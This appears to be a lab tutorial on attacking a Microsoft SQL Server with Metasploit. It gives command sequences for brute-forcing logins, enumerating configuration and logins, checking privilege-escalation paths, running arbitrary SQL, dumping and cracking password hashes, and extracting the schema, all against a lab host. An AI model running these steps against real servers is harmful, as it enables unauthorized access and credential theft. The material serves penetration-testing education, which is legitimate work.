Hello friends today we are performing MSSQL penetration testing using metasploit framework in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Let’s start!!

MSSQL Brute force Attack

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set rhosts 192.168.1.104

msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt

msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(mssql_login) > run

This will perform brute force attack matching valid combination for username and password from given dictionary.

In specified image you can observe that we had successfully retrieve credential for two users:

Username: ignite and password: 12345

Username: sa and password: 123

Enumerate MSSQL configuration setting

This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.

use auxiliary/admin/mssql/mssql_enum

msf auxiliary(mssql_enum) > set rhosts 192.168.1.104

msf auxiliary(mssql_enum) >set password admin123

msf auxiliary(mssql_enum) >run

Above module had dumped the MSSQL configuration setting where you can observe enabled and disable functions. For example:

Xp-cmdshell is enabled which is a function of Microsoft SQL Server that allows system administrators to execute operating system command. Attacker can inject malicious command of file for making unauthorized access into server.

Identifying SQL Server logins

This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.

use auxiliary/admin/mssql/mssql_enum_sql_logins

msf auxiliary(mssql_enum_sql_logins) >set rhosts 192.168.1.104

msf auxiliary(mssql_enum_sql_logins) > set password admin123

msf auxiliary(mssql_enum_sql_logins) > run

From given below image you can confirm the MSSQL Server login such as “sa” which is also sysadmin and another user “ignite”. Once you have enumerated all logins after that you can make dictionary attack for their passwords.

Identify Database owner

This module can be used to escalate privileges to sysadmin if the user has the db_owner role in a trustworthy database owned by a sysadmin user. Once the user has the sysadmin role the msssql_payload module can be used to obtain a shell on the system.

use auxiliary/admin/mssql/mssql_escalate_dbowner

msf auxiliary(mssql_escalate_dbowner) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_dbowner) > set password admin123

msf auxiliary(mssql_escalate_dbowner) >run

Above module will identify whether specified user do have system administrator role or not. From given below image you can perceive that “sa” is sysadmin user.

Identify a User With masquerade privilege

This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges.

use auxiliary/admin/mssql/mssql_escalate_execute_as

msf auxiliary(mssql_escalate_execute_as) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_execute_as) > set password admin123

msf auxiliary(mssql_escalate_execute_as) > run

From given below image you can perceive that “sa” is sysadmin user.

Execute SQL Statement

This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropriate credentials.

use auxiliary/admin/mssql/mssql_sql

msf auxiliary(mssql_sql) > set rhosts 192.168.1.104

msf auxiliary(mssql_sql) > set password admin123

msf auxiliary(mssql_sql) > run

From given below image you can observe that by default it has run SQL statement to Select version as result it has dumped the complete detail version of SQL server. Here you can execute your own sql statement. 

Retrieve MSSQL Password Hashes of Users

This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.

use auxiliary/scanner/mssql/mssql_hashdump

msf auxiliary(mssql_hashdump) > set rhosts 192.168.1.104

msf auxiliary(mssql_hashdump) > set password admin123

msf auxiliary(mssql_hashdump) > run

From given below image you can read the hash value of password set for every database user in MMSQL server.

Decode Password Hashes of Users

This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mssql_fast

msf auxiliary(jtr_mssql_fast) > run

Great!!  The tool John the ripper has successfully decoded the hash value set for passwords.

Extracting MYSQL Schema Information

This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.

use auxiliary/scanner/mssql/mssql_schemadump

msf auxiliary(mssql_schemadump) > set rhosts 192.168.1.104

msf auxiliary(mssql_schemadump) > set password admin123

msf auxiliary(mssql_schemadump) > run

Here it has dump the information schema for database “ignite” with table name “student” , 4 columns name with column types:

DB: ignite

Table name: student_details

Ranking